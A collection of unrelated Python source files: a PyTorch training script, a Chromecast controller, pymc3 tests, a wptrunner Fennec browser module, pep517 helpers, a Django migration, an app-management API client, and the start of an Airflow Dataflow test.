momentum=0.9, weight_decay=5e-4)
# this one could also get 86.38% accuracy in 5_27_15_46_log
# scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=200)
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=70, gamma=0.1)
# Logging
if not os.path.exists('logging'):
os.makedirs('logging')
localtime = time.localtime(time.time())
time_str = str(localtime.tm_mon) + '_' + str(localtime.tm_mday) + '_' + str(localtime.tm_hour) + '_' + str(
localtime.tm_min)
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%m-%d %H:%M:%S',
filename='./logging/' + net_name + '_' + time_str + format(args.lr, '.0e') + '_log.txt',
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler(stream=sys.stdout)
console.setLevel(logging.INFO) # if as INFO will make the console at INFO level thus no additional stdout
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)s-%(levelname)s: %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logger = logging.getLogger()
logger.addHandler(console)
logging.info('Arguments:')
logging.info(args.__dict__)
print("=== Model ===")
print(net)
# summary(net, input_size=(3, 32, 32), device='cuda')
# with torch.cuda.device(0):
# macs, params = get_model_complexity_info(net, (3, 32, 32), as_strings=True, print_per_layer_stat=True,
# verbose=True)
# print('{:<30} {:<8}'.format('Computational complexity: ', macs))
# print('{:<30} {:<8}'.format('Number of parameters: ', params))
# Training
def train(epoch):
print('\nEpoch: %d' % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(tqdm(trainloader, disable=True)): # disable tqdm by true
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
outputs = net(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
# logging.info('Accu: {:.3f}%'.format(100. * correct / total))
def test(epoch):
global best_acc
global best_acc_epoch
net.eval()
test_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = net(inputs)
loss = criterion(outputs, targets)
test_loss += loss.item()
_, predicted = outputs.max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
acc = 100. * correct / total
progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss / (batch_idx + 1), acc, correct, total))
# Save checkpoint.
if acc > best_acc:
# print('Saving..')
state = {
'net': net.state_dict(),
'acc': acc,
'epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
torch.save(state, './checkpoint/ckpt.pth')
best_acc_epoch = epoch
best_acc = acc
return acc, best_acc, best_acc_epoch
def num_zero_error_grad(model):
"""
Return the number of zero gradients and total number of gradients,
can only be used with prune_flag = True for now
"""
if model is None:
return 0
zeros, total = 0, 0
non_zero_indices_list = []
if isinstance(model, AlexNet):
for module in model.children():
if isinstance(module, (GradConv2d, GradLinear)): # comment this line to enable for noPrune
flat_g = module.error_grad.cpu().numpy().flatten()
zeros += np.sum(flat_g == 0)
total += len(flat_g)
non_zero_indices_list = np.where(flat_g != 0)
elif isinstance(module, nn.Sequential):
for layer in module:
# for layer in bblock:
if isinstance(layer, (GradConv2d, GradLinear)):
# print('yes')
flat_g = layer.error_grad.cpu().numpy().flatten()
zeros += np.sum(flat_g == 0)
total += len(flat_g)
non_zero_indices_list = np.where(flat_g != 0)
else:
raise ValueError('The modules involved are not registered for this fn, supports alexnet only')
elif isinstance(model, ResNet):
for module in model.children():
for layer in module:
# for each layer
zero_grad, sum_g = 0, 0
if isinstance(layer, (GradConv2d, GradLinear)): # for conv1 & fc6, comment this line to enable for noprune
flat_g = layer.error_grad.cpu().numpy().flatten()
zero_grad = np.sum(flat_g == 0)
zeros += zero_grad
sum_g = len(flat_g)
total += sum_g
# non_zero_idices = np.where(flat_g != 0)
# zero_grad of this layer write into df
# layers_zero_grad_list.append(zero_grad / sum_g)
# print('testing: this layer is {}, with the idx {}'.format(layer, idx_layer))
elif isinstance(layer, BasicBlock):
flat_g = layer.conv1.error_grad.cpu().numpy().flatten() + layer.conv2.error_grad.cpu().numpy().flatten()
zero_grad = np.sum(flat_g == 0)
zeros += zero_grad
sum_g = len(flat_g)
total += sum_g
# non_zero_idices = np.where(flat_g != 0)
# zero_grad of this layer write into df
# layers_zero_grad_list.append(zero_grad / sum_g)
# print('testing: this layer is {}, with the idx {}'.format(layer, idx_layer))
if layer.shortcut: # check if the sequential object shortcut is not empty
zero_grad, sum_g = 0, 0
flat_g = layer.shortcut[0].error_grad.cpu().numpy().flatten()
zero_grad = np.sum(flat_g == 0)
zeros += zero_grad
sum_g = len(flat_g)
total += sum_g
# zero_grad of this layer write into df
# layers_zero_grad_list.append(zero_grad / sum_g)
# # print('testing: this layer is {}, with the idx {}'.format(layer.shortcut, idx_layer))
# idx_layer += 1
else:
raise ValueError('The error grad measurement supports resnet & alexnet for now')
return int(zeros), int(total), non_zero_indices_list
zero_grads_percentage_list = []
for epoch in range(start_epoch, start_epoch + args.epochs):
train(epoch)
if args.zero_grad_mea:
curr_zero_grads, num_grads, non_zero_indices = num_zero_error_grad(net)
logging.info("[Epoch: {}] Number of zero_grads ({}/{})={:.2%}".format(epoch, curr_zero_grads, num_grads,
curr_zero_grads / num_grads))
# print("Non zero indices is {}".format(non_zero_indices))
grad_per = 100. * curr_zero_grads / num_grads
zero_grads_percentage_list.append(np.around(grad_per, 2))
accu, best_accu, best_accu_epoch = test(epoch)
logging.info("[Epoch: {}] Testing Accu: {}%".format(epoch, accu))
if epoch == args.epochs:
logging.info("[Epoch: {}] has the max accuracy of {}%".format(best_accu_epoch, best_accu))
scheduler.step()
|
from pychromecast.controllers import BaseController
class PixelController(BaseController):
def __init__(self):
super(PixelController, self).__init__("urn:x-cast:de.ytvwld.pixelcast")
def receive_message(self, message, data):
print("Received message: {}".format(data))
return True
def draw(self, x, y, r, g, b):
self.send_message({
"command": "draw",
"x": x,
"y": y,
"r": r,
"g": g,
"b": b
})
|
import numpy as np
import pymc3 as pm
import theano.tensor as tt
from sampled import sampled
SEED = 1
def test_sampled_one_model():
@sampled
def just_a_normal():
pm.Normal('x', mu=0, sd=1)
kwargs = {
'draws': 50,
'tune': 50,
'init': None
}
np.random.seed(SEED)
with just_a_normal():
decorated_trace = pm.sample(**kwargs)
np.random.seed(SEED)
with pm.Model():
pm.Normal('x', mu=0, sd=1)
normal_trace = pm.sample(**kwargs)
assert decorated_trace.varnames == ['x']
np.testing.assert_array_equal(decorated_trace.get_values('x'), normal_trace.get_values('x'))
def test_reuse_model():
@sampled
def two_normals():
mu = pm.Normal('mu', mu=0, sd=1)
pm.Normal('x', mu=mu, sd=1)
with two_normals():
generated_data = pm.sample(draws=50, tune=50, init=None)
for varname in ('mu', 'x'):
assert varname in generated_data.varnames
with two_normals(mu=1):
posterior_data = pm.sample(draws=50, tune=50, init=None)
assert 'x' in posterior_data.varnames
assert 'mu' not in posterior_data.varnames
assert posterior_data.get_values('x').mean() > generated_data.get_values('x').mean()
def test_linear_model():
rows, cols = 100, 10
X = np.random.normal(size=(rows, cols))
w = np.random.normal(size=cols)
y = X.dot(w) + np.random.normal(scale=0.1, size=rows)
@sampled
def linear_model(X, y):
shape = X.shape
X = pm.Normal('X', mu=np.mean(X, axis=0), sd=np.std(X, axis=0), shape=shape)
coefs = pm.Normal('coefs', mu=tt.zeros(shape[1]), sd=tt.ones(shape[1]), shape=shape[1])
pm.Normal('y', mu=tt.dot(X, coefs), sd=tt.ones(shape[0]), shape=shape[0])
with linear_model(X=X, y=y):
sampled_coefs = pm.sample(draws=1000, tune=500)
mean_coefs = sampled_coefs.get_values('coefs').mean(axis=0)
np.testing.assert_allclose(mean_coefs, w, atol=0.1)
def test_partial_model():
rows, cols = 100, 10
X = np.random.normal(size=(rows, cols))
w = np.random.normal(size=cols)
y = X.dot(w) + np.random.normal(scale=0.1, size=rows)
@sampled
def partial_linear_model(X):
shape = X.shape
X = pm.Normal('X', mu=np.mean(X, axis=0), sd=np.std(X, axis=0), shape=shape)
pm.Normal('coefs', mu=tt.zeros(shape[1]), sd=tt.ones(shape[1]), shape=shape[1])
with partial_linear_model(X=X) as model:
coefs = model.named_vars['coefs']
pm.Normal('y', mu=tt.dot(X, coefs), sd=tt.ones(y.shape), observed=y)
sampled_coefs = pm.sample(draws=1000, tune=500)
mean_coefs = sampled_coefs.get_values('coefs').mean(axis=0)
np.testing.assert_allclose(mean_coefs, w, atol=0.1)
|
import os
import tempfile
import moznetwork
from mozprocess import ProcessHandler
from mozprofile import FirefoxProfile
from mozrunner import FennecEmulatorRunner
from tools.serve.serve import make_hosts_file
from .base import (get_free_port,
cmd_arg,
browser_command)
from ..executors.executormarionette import (MarionetteTestharnessExecutor, # noqa: F401
MarionetteRefTestExecutor) # noqa: F401
from .firefox import (get_timeout_multiplier, # noqa: F401
run_info_browser_version,
update_properties, # noqa: F401
executor_kwargs, # noqa: F401
FirefoxBrowser) # noqa: F401
__wptrunner__ = {"product": "fennec",
"check_args": "check_args",
"browser": "FennecBrowser",
"executor": {"testharness": "MarionetteTestharnessExecutor",
"reftest": "MarionetteRefTestExecutor"},
"browser_kwargs": "browser_kwargs",
"executor_kwargs": "executor_kwargs",
"env_extras": "env_extras",
"env_options": "env_options",
"run_info_extras": "run_info_extras",
"update_properties": "update_properties",
"timeout_multiplier": "get_timeout_multiplier"}
def check_args(**kwargs):
pass
def browser_kwargs(test_type, run_info_data, config, **kwargs):
return {"package_name": kwargs["package_name"],
"device_serial": kwargs["device_serial"],
"prefs_root": kwargs["prefs_root"],
"extra_prefs": kwargs["extra_prefs"],
"test_type": test_type,
"debug_info": kwargs["debug_info"],
"symbols_path": kwargs["symbols_path"],
"stackwalk_binary": kwargs["stackwalk_binary"],
"certutil_binary": kwargs["certutil_binary"],
"ca_certificate_path": config.ssl_config["ca_cert_path"],
"stackfix_dir": kwargs["stackfix_dir"],
"binary_args": kwargs["binary_args"],
"timeout_multiplier": get_timeout_multiplier(test_type,
run_info_data,
**kwargs),
"leak_check": kwargs["leak_check"],
"stylo_threads": kwargs["stylo_threads"],
"chaos_mode_flags": kwargs["chaos_mode_flags"],
"config": config,
"install_fonts": kwargs["install_fonts"],
"tests_root": config.doc_root}
def env_extras(**kwargs):
return []
def run_info_extras(**kwargs):
package = kwargs["package_name"]
rv = {"e10s": True if package is not None and "geckoview" in package else False,
"headless": False,
"sw-e10s": False}
rv.update(run_info_browser_version(kwargs["binary"]))
return rv
def env_options():
# The server host is set to public localhost IP so that resources can be accessed
# from Android emulator
return {"server_host": moznetwork.get_ip(),
"bind_address": False,
"supports_debugger": True}
def write_hosts_file(config, device):
new_hosts = make_hosts_file(config, moznetwork.get_ip())
current_hosts = device.get_file("/etc/hosts")
if new_hosts == current_hosts:
return
hosts_fd, hosts_path = tempfile.mkstemp()
try:
with os.fdopen(hosts_fd, "w") as f:
f.write(new_hosts)
device.remount()
device.push(hosts_path, "/etc/hosts")
finally:
os.remove(hosts_path)
class FennecBrowser(FirefoxBrowser):
init_timeout = 300
shutdown_timeout = 60
def __init__(self, logger, prefs_root, test_type, package_name=None,
device_serial="emulator-5444", **kwargs):
FirefoxBrowser.__init__(self, logger, None, prefs_root, test_type, **kwargs)
self._package_name = package_name
self.device_serial = device_serial
self.tests_root = kwargs["tests_root"]
self.install_fonts = kwargs["install_fonts"]
self.stackwalk_binary = kwargs["stackwalk_binary"]
@property
def package_name(self):
"""
Name of app to run on emulator.
"""
if self._package_name is None:
self._package_name = "org.mozilla.fennec"
user = os.getenv("USER")
if user:
self._package_name += "_" + user
return self._package_name
def start(self, **kwargs):
if self.marionette_port is None:
self.marionette_port = get_free_port()
env = {}
env["MOZ_CRASHREPORTER"] = "1"
env["MOZ_CRASHREPORTER_SHUTDOWN"] = "1"
env["MOZ_DISABLE_NONLOCAL_CONNECTIONS"] = "1"
env["STYLO_THREADS"] = str(self.stylo_threads)
if self.chaos_mode_flags is not None:
env["MOZ_CHAOSMODE"] = str(self.chaos_mode_flags)
preferences = self.load_prefs()
self.profile = FirefoxProfile(preferences=preferences)
self.profile.set_preferences({"marionette.port": self.marionette_port,
"dom.disable_open_during_load": False,
"places.history.enabled": False,
"dom.send_after_paint_to_content": True,
"network.preload": True})
if self.test_type == "reftest":
self.logger.info("Setting android reftest preferences")
self.profile.set_preferences({"browser.viewport.desktopWidth": 800,
# Disable high DPI
"layout.css.devPixelsPerPx": "1.0",
# Ensure that the full browser element
# appears in the screenshot
"apz.allow_zooming": False,
"android.widget_paints_background": False,
# Ensure that scrollbars are always painted
"layout.testing.overlay-scrollbars.always-visible": True})
if self.install_fonts:
self.logger.debug("Copying Ahem font to profile")
font_dir = os.path.join(self.profile.profile, "fonts")
if not os.path.exists(font_dir):
os.makedirs(font_dir)
with open(os.path.join(self.tests_root, "fonts", "Ahem.ttf"), "rb") as src:
with open(os.path.join(font_dir, "Ahem.ttf"), "wb") as dest:
dest.write(src.read())
if self.leak_check and kwargs.get("check_leaks", True):
self.leak_report_file = os.path.join(self.profile.profile, "runtests_leaks.log")
if os.path.exists(self.leak_report_file):
os.remove(self.leak_report_file)
env["XPCOM_MEM_BLOAT_LOG"] = self.leak_report_file
else:
self.leak_report_file = None
if self.ca_certificate_path is not None:
self.setup_ssl()
debug_args, cmd = browser_command(self.package_name,
self.binary_args if self.binary_args else [] +
[cmd_arg("marionette"), "about:blank"],
self.debug_info)
self.runner = FennecEmulatorRunner(app=self.package_name,
profile=self.profile,
cmdargs=cmd[1:],
env=env,
symbols_path=self.symbols_path,
serial=self.device_serial,
# TODO - choose appropriate log dir
logdir=os.getcwd(),
process_class=ProcessHandler,
process_args={"processOutputLine": [self.on_output]})
self.logger.debug("Starting %s" % self.package_name)
# connect to a running emulator
self.runner.device.connect()
write_hosts_file(self.config, self.runner.device.device)
self.runner.stop()
self.runner.start(debug_args=debug_args, interactive=self.debug_info and self.debug_info.interactive)
self.runner.device.device.forward(
local="tcp:{}".format(self.marionette_port),
remote="tcp:{}".format(self.marionette_port))
self.logger.debug("%s Started" % self.package_name)
def stop(self, force=False):
if self.runner is not None:
if (self.runner.device.connected and
len(self.runner.device.device.list_forwards()) > 0):
try:
self.runner.device.device.remove_forwards(
"tcp:{}".format(self.marionette_port))
except Exception:
self.logger.warning("Failed to remove port forwarding")
# We assume that stopping the runner prompts the
# browser to shut down. This allows the leak log to be written
self.runner.stop()
self.logger.debug("stopped")
def check_crash(self, process, test):
if not os.environ.get("MINIDUMP_STACKWALK", "") and self.stackwalk_binary:
os.environ["MINIDUMP_STACKWALK"] = self.stackwalk_binary
return self.runner.check_for_crashes()
|
import threading
from contextlib import contextmanager
import os
from os.path import dirname, abspath, join as pjoin
import shutil
from subprocess import check_call, check_output, STDOUT
import sys
from tempfile import mkdtemp
from . import compat
_in_proc_script = pjoin(dirname(abspath(__file__)), '_in_process.py')
@contextmanager
def tempdir():
td = mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
class BackendUnavailable(Exception):
"""Will be raised if the backend cannot be imported in the hook process."""
def __init__(self, traceback):
self.traceback = traceback
class BackendInvalid(Exception):
"""Will be raised if the backend is invalid."""
def __init__(self, backend_name, backend_path, message):
self.backend_name = backend_name
self.backend_path = backend_path
self.message = message
class HookMissing(Exception):
"""Will be raised on missing hooks."""
def __init__(self, hook_name):
super(HookMissing, self).__init__(hook_name)
self.hook_name = hook_name
class UnsupportedOperation(Exception):
"""May be raised by build_sdist if the backend indicates that it can't."""
def __init__(self, traceback):
self.traceback = traceback
def default_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""The default method of calling the wrapper subprocess."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_call(cmd, cwd=cwd, env=env)
def quiet_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""A method of calling the wrapper subprocess while suppressing output."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_output(cmd, cwd=cwd, env=env, stderr=STDOUT)
def norm_and_check(source_tree, requested):
"""Normalise and check a backend path.
Ensure that the requested backend path is specified as a relative path,
and resolves to a location under the given source tree.
Return an absolute version of the requested path.
"""
if os.path.isabs(requested):
raise ValueError("paths must be relative")
abs_source = os.path.abspath(source_tree)
abs_requested = os.path.normpath(os.path.join(abs_source, requested))
# We have to use commonprefix for Python 2.7 compatibility. So we
# normalise case to avoid problems because commonprefix is a character
# based comparison :-(
norm_source = os.path.normcase(abs_source)
norm_requested = os.path.normcase(abs_requested)
if os.path.commonprefix([norm_source, norm_requested]) != norm_source:
raise ValueError("paths must be inside source tree")
return abs_requested
class Pep517HookCaller(object):
"""A wrapper around a source directory to be built with a PEP 517 backend.
source_dir : The path to the source directory, containing pyproject.toml.
build_backend : The build backend spec, as per PEP 517, from
pyproject.toml.
backend_path : The backend path, as per PEP 517, from pyproject.toml.
runner : A callable that invokes the wrapper subprocess.
The 'runner', if provided, must expect the following:
cmd : a list of strings representing the command and arguments to
execute, as would be passed to e.g. 'subprocess.check_call'.
cwd : a string representing the working directory that must be
used for the subprocess. Corresponds to the provided source_dir.
extra_environ : a dict mapping environment variable names to values
which must be set for the subprocess execution.
"""
def __init__(
self,
source_dir,
build_backend,
backend_path=None,
runner=None,
):
if runner is None:
runner = default_subprocess_runner
self.source_dir = abspath(source_dir)
self.build_backend = build_backend
if backend_path:
backend_path = [
norm_and_check(self.source_dir, p) for p in backend_path
]
self.backend_path = backend_path
self._subprocess_runner = runner
# TODO: Is this over-engineered? Maybe frontends only need to
# set this when creating the wrapper, not on every call.
@contextmanager
def subprocess_runner(self, runner):
"""A context manager for temporarily overriding the default subprocess
runner.
"""
prev = self._subprocess_runner
self._subprocess_runner = runner
yield
self._subprocess_runner = prev
def get_requires_for_build_wheel(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.:
["wheel >= 0.25", "setuptools"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_wheel', {
'config_settings': config_settings
})
def prepare_metadata_for_build_wheel(
self, metadata_directory, config_settings=None,
_allow_fallback=True):
"""Prepare a *.dist-info folder with metadata for this project.
Returns the name of the newly created folder.
If the build backend defines a hook with this name, it will be called
in a subprocess. If not, the backend will be asked to build a wheel,
and the dist-info extracted from that (unless _allow_fallback is
False).
"""
return self._call_hook('prepare_metadata_for_build_wheel', {
'metadata_directory': abspath(metadata_directory),
'config_settings': config_settings,
'_allow_fallback': _allow_fallback,
})
def build_wheel(
self, wheel_directory, config_settings=None,
metadata_directory=None):
"""Build a wheel from this project.
Returns the name of the newly created file.
In general, this will call the 'build_wheel' hook in the backend.
However, if that was previously called by
'prepare_metadata_for_build_wheel', and the same metadata_directory is
used, the previously built wheel will be copied to wheel_directory.
"""
if metadata_directory is not None:
metadata_directory = abspath(metadata_directory)
return self._call_hook('build_wheel', {
'wheel_directory': abspath(wheel_directory),
'config_settings': config_settings,
'metadata_directory': metadata_directory,
})
def get_requires_for_build_sdist(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.:
["setuptools >= 26"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_sdist', {
'config_settings': config_settings
})
def build_sdist(self, sdist_directory, config_settings=None):
"""Build an sdist from this project.
Returns the name of the newly created file.
This calls the 'build_sdist' backend hook in a subprocess.
"""
return self._call_hook('build_sdist', {
'sdist_directory': abspath(sdist_directory),
'config_settings': config_settings,
})
def _call_hook(self, hook_name, kwargs):
# On Python 2, pytoml returns Unicode values (which is correct) but the
# environment passed to check_call needs to contain string values. We
# convert here by encoding using ASCII (the backend can only contain
# letters, digits and _, . and : characters, and will be used as a
# Python identifier, so non-ASCII content is wrong on Python 2 in
# any case).
# For backend_path, we use sys.getfilesystemencoding.
if sys.version_info[0] == 2:
build_backend = self.build_backend.encode('ASCII')
else:
build_backend = self.build_backend
extra_environ = {'PEP517_BUILD_BACKEND': build_backend}
if self.backend_path:
backend_path = os.pathsep.join(self.backend_path)
if sys.version_info[0] == 2:
backend_path = backend_path.encode(sys.getfilesystemencoding())
extra_environ['PEP517_BACKEND_PATH'] = backend_path
with tempdir() as td:
hook_input = {'kwargs': kwargs}
compat.write_json(hook_input, pjoin(td, 'input.json'),
indent=2)
# Run the hook in a subprocess
self._subprocess_runner(
[sys.executable, _in_proc_script, hook_name, td],
cwd=self.source_dir,
extra_environ=extra_environ
)
data = compat.read_json(pjoin(td, 'output.json'))
if data.get('unsupported'):
raise UnsupportedOperation(data.get('traceback', ''))
if data.get('no_backend'):
raise BackendUnavailable(data.get('traceback', ''))
if data.get('backend_invalid'):
raise BackendInvalid(
backend_name=self.build_backend,
backend_path=self.backend_path,
message=data.get('backend_error', '')
)
if data.get('hook_missing'):
raise HookMissing(hook_name)
return data['return_val']
class LoggerWrapper(threading.Thread):
"""
Read messages from a pipe and redirect them
to a logger (see python's logging module).
"""
def __init__(self, logger, level):
threading.Thread.__init__(self)
self.daemon = True
self.logger = logger
self.level = level
# create the pipe and reader
self.fd_read, self.fd_write = os.pipe()
self.reader = os.fdopen(self.fd_read)
self.start()
def fileno(self):
return self.fd_write
@staticmethod
def remove_newline(msg):
return msg[:-1] if msg.endswith(os.linesep) else msg
def run(self):
for line in self.reader:
self._write(self.remove_newline(line))
def _write(self, message):
self.logger.log(self.level, message)
|
# Generated by Django 2.1.1 on 2018-09-30 01:06
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Contact",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("listing", models.CharField(max_length=200)),
("listing_id", models.IntegerField()),
("name", models.CharField(max_length=200)),
("email", models.CharField(max_length=100)),
("phone", models.CharField(max_length=100)),
("message", models.TextField(blank=True)),
(
"contact_date",
models.DateTimeField(blank=True, default=datetime.datetime.now),
),
("user_id", models.IntegerField(blank=True)),
],
),
]
|
import requests
import json
from config import config
from api_client.url_helpers.internal_app_url import get_create_internal_app_from_blob_url, get_edit_assignment_url
from api_client.url_helpers.internal_app_url import get_retire_app_url, get_internal_app_assignment_url
from Logs.log_configuration import configure_logger
from models.api_header_model import RequestHeader
log = configure_logger('default')
def create_app(transaction_data):
"""
Creates a new application based on the transaction data model
:param transaction_data: Transaction data model
:return: Returns True/False indicating Success/Failure and Application ID(0 in case of failure)
"""
api_url = get_create_internal_app_from_blob_url()
headers = RequestHeader().header
api_body = {
'TransactionId': str(transaction_data.transaction_id),
'Description': transaction_data.description,
'BlobId': transaction_data.blob_id,
'PushMode': transaction_data.push_mode,
'ApplicationName': transaction_data.application_name,
'FileName': transaction_data.file_name,
'DeviceType': transaction_data.device_type,
'EnableProvisioning': transaction_data.enable_provisioning,
'UploadViaLink': transaction_data.upload_via_link,
'LocationGroupId': config.TENANT_GROUP_ID,
'SupportedModels': transaction_data.supported_models,
'BundleId': None,
'ActualFileVersion': None,
'AppVersion': transaction_data.app_version,
'SupportedProcessorArchitecture': None,
'MsiDeploymentParamModel': {'RetryCount': None,
'InstallTimeoutInMinutes': None,
'CommandLineArguments': None,
'RetryIntervalInMinutes': None},
'DeploymentOptions': None,
'IsDependencyFile': False,
'FilesOptions': None,
'CarryOverAssignments': transaction_data.carry_over_assignments
}
payload = json.dumps(api_body)
try:
response = requests.post(api_url, headers=headers, data=payload)
if not response.ok:
log.debug(f'{response.status_code}, {response.reason}, {response.content}') # HTTP
return False, 0, 0, ''
else:
response_data = json.loads(response.content)
app_version = response_data['AppVersion']
bundle_id = response_data['BundleId']
log.debug('Application saved with Application ID {id}'.format(id=response_data['Id']['Value']))
return True, response_data['Id']['Value'], app_version, bundle_id
except Exception as e:
log.error('Application creation failed for transactionId: {}'.format(transaction_data.transaction_id, str(e)))
def retire_app(app_id):
"""
Retires the app based on the Application ID
:param app_id: Application ID
:return: True/False indicating Success/Failure
"""
api_url = get_retire_app_url(app_id)
headers = RequestHeader().header
try:
response = requests.post(api_url, headers=headers)
log.debug(f'{response.status_code}, {response.reason}, {response.content}')
if not response.ok:
return False
else:
return True
except Exception as e:
log.error('Application creation failed for transactionId: {}'.format(str(e)))
def add_assignments(app_id, app_assignment_model):
"""
Assigns the app created to specified smart groups
:param app_id: Application ID
:param app_assignment_model: Assignment Model
:return: True/False indicating Success/Failure
"""
api_url = get_internal_app_assignment_url(app_id)
headers = RequestHeader().header
api_body = {
'SmartGroupIds': app_assignment_model.smart_group_ids,
'DeploymentParameters': app_assignment_model.deployment_parameters
}
payload = json.dumps(api_body)
try:
response = requests.post(api_url, headers=headers, data=payload)
log.debug(f'{response.status_code}, {response.reason}, {response.content}')
if not response.ok:
return False
else:
log.debug('App with ID: {id} assigned to smartgroups {groups}'
.format(id=app_id, groups=app_assignment_model.smart_group_ids))
return True
except Exception as e:
log.error('Application assignment failed for Application : {id} with error {e}'.format(id=app_id, e=str(e)))
def edit_app_assignment(app_id, app_assignment_model, assignment_group_for_deletion):
"""
Edits the app assignment for given Application ID
:param app_id: Application ID
:param app_assignment_model: App assignment model
:param assignment_group_for_deletion: Smartgroup IDs that has to be deleted from assignment
:return: True/False indicating Success/Failure
"""
api_url = get_edit_assignment_url(app_id)
headers = RequestHeader().header
api_body = {
'SmartGroupIds': app_assignment_model.smart_group_ids,
'SmartGroupIdsForDeletion': assignment_group_for_deletion,
'DeploymentParameters': app_assignment_model.deployment_parameters
}
payload = json.dumps(api_body)
try:
response = requests.put(api_url, headers=headers, data=payload)
log.debug(f'{response.status_code}, {response.reason}')
if not response.ok:
return False
else:
log.debug('App(AppID : {id}) assignment updated with smartgroups {groups}'
.format(id=app_id, groups=app_assignment_model.smart_group_ids))
return True
except Exception as e:
log.error('Application edit assignment failed for Application: {id} with error {e}'.format(id=app_id, e=str(e)))
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from .activity import *
from .get_activity import *
from .get_state_machine import *
from .state_machine import *
from ._inputs import *
from . import outputs
|
# Solution of;
# Project Euler Problem 72: Counting fractions
# https://projecteuler.net/problem=72
#
# Consider the fraction, n/d, where n and d are positive integers. If n<d and
# HCF(n,d)=1, it is called a reduced proper fraction. If we list the set of
# reduced proper fractions for d ≤ 8 in ascending order of size, we get:1/8,
# 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5, 5/8, 2/3, 5/7,
# 3/4, 4/5, 5/6, 6/7, 7/8It can be seen that there are 21 elements in this
# set. How many elements would be contained in the set of reduced proper
# fractions for d ≤ 1,000,000?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 72
timed.caller(dummy, n, i, prob_id)
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import copy
import shlex
import subprocess
import unittest
from typing import Any, Dict
from unittest import mock
from unittest.mock import MagicMock
from uuid import UUID
import pytest
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.apache.beam.hooks.beam import BeamCommandRunner, BeamHook
from airflow.providers.google.cloud.hooks.dataflow import (
DEFAULT_DATAFLOW_LOCATION,
DataflowHook,
DataflowJobStatus,
DataflowJobType,
_DataflowJobsController,
_fallback_to_project_id_from_variables,
process_line_and_extract_dataflow_job_id_callback,
)
DEFAULT_RUNNER = "DirectRunner"
BEAM_STRING = 'airflow.providers.apache.beam.hooks.beam.{}'
TASK_ID = 'test-dataflow-operator'
JOB_NAME = 'test-dataflow-pipeline'
MOCK_UUID = UUID('cf4a56d2-8101-4217-b027-2af6216feb48')
MOCK_UUID_PREFIX = str(MOCK_UUID)[:8]
UNIQUE_JOB_NAME = f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}'
TEST_TEMPLATE = 'gs://dataflow-templates/wordcount/template_file'
PARAMETERS = {
'inputFile': 'gs://dataflow-samples/shakespeare/kinglear.txt',
'output': 'gs://test/output/my_output',
}
PY_FILE = 'apache_beam.examples.wordcount'
JAR_FILE = 'unitest.jar'
JOB_CLASS = 'com.example.UnitTest'
PY_OPTIONS = ['-m']
DATAFLOW_VARIABLES_PY = {'project': 'test', 'staging_location': 'gs://test/staging', 'labels': {'foo': 'bar'}}
DATAFLOW_VARIABLES_JAVA = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'labels': {'foo': 'bar'},
}
RUNTIME_ENV = {
'additionalExperiments': ['exp_flag1', 'exp_flag2'],
'additionalUserLabels': {'name': 'wrench', 'mass': '1.3kg', 'count': '3'},
'bypassTempDirValidation': {},
'ipConfiguration': 'WORKER_IP_PRIVATE',
'kmsKeyName': (
